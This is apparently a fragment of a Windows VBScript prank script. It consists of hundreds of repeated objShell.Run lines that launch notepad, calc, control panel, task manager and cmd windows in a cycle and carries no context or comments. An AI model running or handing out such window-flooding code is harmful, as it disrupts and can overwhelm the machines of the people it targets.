objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

